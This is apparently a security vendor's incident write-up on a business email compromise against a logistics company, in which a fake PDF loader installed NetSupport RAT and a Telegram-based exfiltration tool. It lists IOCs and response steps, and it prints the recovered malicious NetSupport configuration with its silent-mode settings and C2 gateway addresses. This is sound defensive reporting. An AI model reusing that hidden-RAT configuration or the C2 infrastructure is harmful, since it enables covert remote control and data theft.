BEC Fraud NetSupport RAT: Logistics

  • Project : BEC Fraud Detection
  • Company : Merabytes
  • Sector : Logistics
  • Date : 16 December, 2025
  • Duration : Real-time detection

Share:

We're here to help!

Need assistance? We're here to help with support, guidance, and resources. Reach out to us anytime.

BEC Fraud NetSupport RAT: Logistics

Real case: Logistics sector company victim of BEC fraud with NetSupport RAT (client name omitted for confidentiality)

Anatomy of a BEC Fraud Against Logistics Companies (Python Loader + Telegram C2 + NetSupport - SentinelOne Bypass)

Key Points

On December 16, 2025, we detected an active compromise initiated through a Spear Phishing campaign targeting the logistics sector. The attackers maintained an email conversation for more than a week (since December 8) posing as a legitimate customer (“Michał Grzegorzewski”) negotiating transport loads, gaining the victim’s trust.

The attack culminated by redirecting the victim to a fraudulent portal (euroads[.]eu) to download a supposed “cargo order”. The downloaded file, Order_024771.exe, was a Compiled Python Loader with a fake PDF icon.

Upon execution, this binary established a connection with VPS infrastructure in New York (173.225.111.189) to download the second phase of the attack: the commercial RAT NetSupport Manager (from NETSUPPORT LTD.) and an exfiltration tool (which, from the detected strings, appears to be AI-programmed), .NET-based, that abuses the Telegram API.

Incident Description

🎣 Initial Access: Long-term Email Social Engineering

The entry vector is distinguished by its high sophistication and patience. Unlike mass campaigns, the attacker maintained a coherent email thread negotiating prices (€1,200 - €1,500), routes (NL to FR), and technical details (FTL, 8T) for 8 days.

On December 16, after simulating an agreement, the attacker (“Michał”) instructed the victim to register on an external platform to “reserve the load” and download the order PDF.

Excerpt from malicious email (The hook):

From: Michał Grzegorzewski mgrzegorzewski2.kaspeda@gmail.com
Sent: Tuesday, December 16, 2025 11:31
To: [REDACTED]
Subject: Re: Invoice with POD

The victim accessed the domain euroads[.]eu/order, a cloned/fraudulent portal, where they downloaded the malicious file.

⚡ Execution and Staging (Python Loader)

The downloaded file was named Order_024771.exe. Despite having a PDF document icon to deceive the user, it was a compiled Python executable that acted as a loader for the Telegram.exe tool (explained later) and the modified NetSupport executable.

Immediately after manual execution by the user, the Order_024771.exe process initiated an outbound network connection to retrieve the final payloads.

Connection destination:

  • IP: 173.225.111.189
  • Host: vps3191010.trouble-free.net
  • Provider (ISP): Interserver, Inc (Hosting / Data Center)
  • Location: New York City, USA 🇺🇸

This IP corresponds to a VPS rented by the attacker, used as a first-stage C2.

📦 NetSupport RAT Deployment

Once the VPS was contacted, the stager dropped NetSupport Manager components to disk:

  • Legitimate Execution: The Client.exe binary (signed and legitimate from NetSupport) is executed.
  • Malicious Load: Client.exe is programmed to load libraries from its same directory. The attacker loaded the DLLs into the directory using the Python Loader and file transfer.

🕵️ Forensic Configuration Analysis (NetSupport Client32.ini)

During forensic disk analysis, we recovered the malware configuration file (Client32.ini). Its content confirms malicious intent, as it disables all visual alerts for the user and configures external Command and Control (C2) servers.

Recovered configuration:

[Client]
_present=1
DisableChatMenu=1          ; Prevents user from seeing chat options
DisableClientConnect=1     ; Hides connection
DisableDisconnect=1        ; Prevents user from disconnecting the RAT
HideWhenIdle=1
ShowUIOnConnect=0          ; Does not show interface when attacker connects
silent=1                   ; Silent mode activated
SysTray=0                  ; Hides icon in taskbar
Usernames=*                ; Allows connection to any logged-in user

[HTTP]
GatewayAddress=akusa.icu:443       ; Primary C2
SecondaryGateway=45.93.20.177:443  ; Backup C2 (IP of Chang Way Technologies Co. Limited)
GSK=EDHF;I>MBBEHHO<G

Interpretation: The attacker has configured the RAT to be invisible (SysTray=0, silent=1). It uses a domain (akusa.icu) and a direct IP as backup to ensure connection. The GSK value is the encryption key needed to communicate with the attacker’s Gateway.

🤖 Exfiltration via Telegram (.NET) and Evasion

Parallel to the RAT, a binary named Telegram.exe was deployed. Forensic analysis confirms it is not the official application, but a .NET tool developed by the attacker.

Purpose: Use the public Telegram API as a Command and Control (C2) channel. This allows data exfiltration traffic to blend with legitimate HTTPS traffic, making detection by conventional firewalls difficult.

Detection and IOCs (Indicators of Compromise)

🌐 Network and Infrastructure

  • Staging / Primary C2 IP: 173.225.111.189 (Interserver, VPS, Hostname: vps3191010.trouble-free.net)
  • C2 Domain: akusa.icu (45.93.20.177)
  • Phishing Domains: euroads[.]eu/order (VirusTotal)
  • Threat Actor Emails: mgrzegorzewski2.kaspeda@gmail.com (Alias: Michał Grzegorzewski)

📂 File Hashes (SHA256)

  • Initial Dropper (Python Loader disguised as PDF): bacee81bd00a56c617e05a9fdb9a89cd1a47eea13ba986176fc5dc6000235fad (Identified as 1.exe or Order_024771.exe) (VirusTotal)
  • Fake Telegram (.NET C2 Tool): 54d3a59d202bc7de11f794b127395363e8eeb3d2
  • Malicious DLL (Side-Loading): a6f89004a246b6ae6e41326052837d375ac832399ac4657ae9549a404f31f140 (PCICL32.DLL) (VirusTotal)

SOC Response

  1. Credential Reset: Reset all passwords for the affected user, as the RAT has keylogging and cookie theft capabilities.
  2. Isolation: Immediately disconnect the device from the corporate network.
  3. Cleanup: Remove files in %AppData% and %Temp% related to Telegram.exe and the NetSupport installation folder.
  4. Process Monitoring: Alert on any execution of remote control binaries (RMM) and programs named Telegram.exe that are not digitally signed by “Telegram FZ-LLC” and are .NET binaries.
  5. Side-Loading Detection: Alert on creation or loading of .exe executables and DLLs from user temporary directories (AppData, Temp, Downloads) instead of Program Files.

How Merabytes Would Have Protected

Merabytes Defense Area How It Would Have Acted Expected Result
Email behavior analysis Detection of prolonged social engineering: unusual negotiation followed by external link for “order” download. Early alert before users download malicious executable.
Endpoint threat analysis Detection of Python Loader running from Downloads with immediate C2 connection to foreign VPS. Block loader before downloading RAT.
Commercial RAT detection Identification of NetSupport Client.exe running from non-standard directories with silent configuration. RAT process termination and endpoint isolation.
Side-Loading monitoring Detection of Client.exe loading malicious DLLs from temporary directories instead of Program Files. Prevention of malicious component loading.
Telegram traffic analysis Detection of unofficial Telegram.exe (.NET) communicating with Telegram API for C2/exfiltration. Block alternative C2 channel and prevent exfiltration.
Vulnerability and IOC analysis Updated database with attack IOCs: hashes, domains (euroads[.]eu, akusa.icu), IPs (173.225.111.189). Proactive blocking of known malicious infrastructure.

#cybersecurity #bec #businessemailcompromise #netsupport #rat #logistics #dfir #merabytes

If you’re interested in protecting your infrastructure against sophisticated BEC attacks and commercial RATs, visit merabytes.com and request access to our continuous monitoring, endpoint protection, and behavior analysis services.

How an Adversary-Aware SOC prevents these scenarios

Discover how our Adversary-Aware Security Operations Center proactively identifies and neutralizes threats before they impact your business.

An Adversary-Aware SOC goes beyond traditional security monitoring by understanding attacker tactics, techniques, and procedures (TTPs). We proactively hunt for threats using MITRE ATT&CK framework, behavioral analysis, and threat intelligence to detect attacks that bypass conventional security controls.

Traditional security tools focus on known signatures and indicators. Our behavioral detection analyzes anomalies in user activity, email patterns, network traffic, and system behavior to identify sophisticated attacks that use legitimate tools or bypass authentication controls. This caught the attacks in these case studies before significant damage occurred.

Our SOC operates 24/7 with real-time monitoring and automated response capabilities. Critical alerts trigger immediate investigation and containment actions within minutes. We provide continuous threat hunting, forensic analysis, and coordinated incident response to minimize impact and prevent lateral movement.

We combine global threat intelligence feeds with our own research from real incidents. Every attack we analyze contributes to our detection rules and IOC database, which is immediately shared across all protected environments. This means if we see a new attack pattern targeting one client, all clients are automatically protected within hours.

Absolutely. Our SOC integrates with your existing EDR, XDR, SIEM, firewalls, email security, and identity protection tools. We enhance their effectiveness by correlating events across all sources, applying adversary-aware detection logic, and providing expert human analysis that automated tools alone cannot achieve.